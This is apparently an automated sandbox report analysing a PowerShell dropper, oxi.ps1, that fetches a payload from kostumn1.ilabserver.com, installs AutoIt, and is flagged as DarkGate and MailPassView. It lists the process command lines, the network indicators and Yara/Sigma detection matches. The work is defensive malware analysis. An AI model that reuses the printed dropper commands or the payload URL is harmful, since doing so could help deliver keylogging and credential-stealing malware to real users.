Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oxi.ps1

Overview

General Information

Sample name:oxi.ps1
Analysis ID:1448082
MD5:f391262039244472c29e2b3b788a4a79
SHA1:b6db78ac395a0191883670595a88bd0fa52a87f8
SHA256:d28c416add7fe55e7b1a20e30013e870cfb2eb3c9a5962ed4047766a43fa4f5e
Tags:ps1
Infos:

Detection

DarkGate, MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DarkGate
Yara detected MailPassView
AI detected suspicious sample
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 7448 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • Autoit3.exe (PID: 7524 cmdline: "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)
      • cmd.exe (PID: 7540 cmdline: "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7592 cmdline: wmic ComputerSystem get domain MD5: E2DE6500DE1148C7F6027AD50AC8B891)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkGateFirst documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DarkGateYara detected DarkGateJoe Security
    00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DarkGateYara detected DarkGateJoe Security
      00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7276.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x380:$b2: ::FromBase64String(
            • 0x35f:$b3: ::UTF8.GetString(
            • 0xbbfa:$s1: -join
            • 0x53a6:$s4: +=
            • 0x5468:$s4: +=
            • 0x968f:$s4: +=
            • 0xb7ac:$s4: +=
            • 0xba96:$s4: +=
            • 0xbbdc:$s4: +=
            • 0x19597:$s4: +=
            • 0x1969b:$s4: +=
            • 0x1caf7:$s4: +=
            • 0x1d1d7:$s4: +=
            • 0x1d68d:$s4: +=
            • 0x1d6e2:$s4: +=
            • 0x1d956:$s4: +=
            • 0x1d985:$s4: +=
            • 0x1decd:$s4: +=
            • 0x1defc:$s4: +=
            • 0x1dfdb:$s4: +=
            • 0x20272:$s4: +=

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", ProcessId: 7276, ProcessName: powershell.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7276, TargetFilename: C:\downloads\Autoit3.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1", ProcessId: 7276, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Multi AV Scanner detection for submitted file
            Source: oxi.ps1Virustotal: Detection: 12%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.3% probability
            Machine Learning detection for dropped file
            Source: C:\downloads\Autoit3.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 167.235.238.203:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00864005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00864005
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0086C2FF
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086494A GetFileAttributesW,FindFirstFileW,FindClose,3_2_0086494A
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_0086CD9F
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086CD14 FindFirstFileW,FindClose,3_2_0086CD14
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0086F5D8
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0086F735
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0086FA36
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00863CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00863CE2
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D2F39 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_011D2F39
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D1F314 FindFirstFileW,FindNextFileW,FindClose,3_2_03D1F314
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D1DF18 FindFirstFileW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,3_2_03D1DF18
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CF9DF0 FindFirstFileW,FindNextFileW,FindClose,3_2_03CF9DF0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kostumn1.ilabserver.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008729BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,3_2_008729BA
            Source: global trafficHTTP traffic detected: GET /1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kostumn1.ilabserver.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: kostumn1.ilabserver.com
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCBAEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kostumn1.ilabserver.com
            Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DC9FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Autoit3.exe, 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp, Autoit3.exe.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DC9FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB14D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCB467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
            Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCBC11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kostumn1.ilabsX
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kostumn1.ilabserver.com
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kostumn1.ilabserver.com/1.zip
            Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Autoit3.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/06
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownHTTPS traffic detected: 167.235.238.203:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00874632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00874632
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00874830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00874830
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00874632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00874632
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D00DAC GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,3_2_03D00DAC
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00860508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,3_2_00860508
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0088D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0088D164
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CF3704 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,3_2_03CF3704

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_7276.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7276, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\downloads\Autoit3.exeJump to dropped file
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CECBF4 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,3_2_03CECBF4
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D17B38 NtDuplicateObject,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,3_2_03D17B38
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D17A90 NtQueryObject,3_2_03D17A90
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D17A5C NtDuplicateObject,NtClose,3_2_03D17A5C
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D17DDC Sleep,TerminateThread,NtClose,NtClose,3_2_03D17DDC
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008642D5: CreateFileW,DeviceIoControl,CloseHandle,3_2_008642D5
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00858F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00858F2E
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00865778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_00865778
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B95337D0_2_00007FFD9B95337D
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008016633_2_00801663
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00809C803_2_00809C80
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008223F53_2_008223F5
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008884003_2_00888400
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008365023_2_00836502
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0080E6F03_2_0080E6F0
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0083265E3_2_0083265E
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082282A3_2_0082282A
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008389BF3_2_008389BF
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00880A3A3_2_00880A3A
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00836A743_2_00836A74
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00810BE03_2_00810BE0
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0085EDB23_2_0085EDB2
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082CD513_2_0082CD51
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00880EB73_2_00880EB7
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00868E443_2_00868E44
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00836FE63_2_00836FE6
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0080B0203_2_0080B020
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008233B73_2_008233B7
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008094E03_2_008094E0
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082F4093_2_0082F409
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0081D45D3_2_0081D45D
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0080F6A03_2_0080F6A0
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008216B43_2_008216B4
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0081F6283_2_0081F628
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008278C33_2_008278C3
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082DBA53_2_0082DBA5
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00821BA83_2_00821BA8
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00839CE53_2_00839CE5
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0081DD283_2_0081DD28
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00821FC03_2_00821FC0
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082BFD63_2_0082BFD6
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CEC0EC3_2_03CEC0EC
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D048243_2_03D04824
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CE4E3C3_2_03CE4E3C
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D10DDC3_2_03D10DDC
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D0F7F43_2_03D0F7F4
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CCD7823_2_03CCD782
            Source: Joe Sandbox ViewDropped File: C:\downloads\Autoit3.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
            Source: C:\downloads\Autoit3.exeCode function: String function: 03CC46D0 appears 32 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 00820D17 appears 70 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 00828B30 appears 42 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 03CC6A70 appears 77 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 03CF82D8 appears 32 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 03CC4714 appears 70 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 00811A36 appears 34 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 03CC4440 appears 102 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 03CC49B0 appears 96 times
            Source: C:\downloads\Autoit3.exeCode function: String function: 03CE746C appears 98 times
            Source: amsi64_7276.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
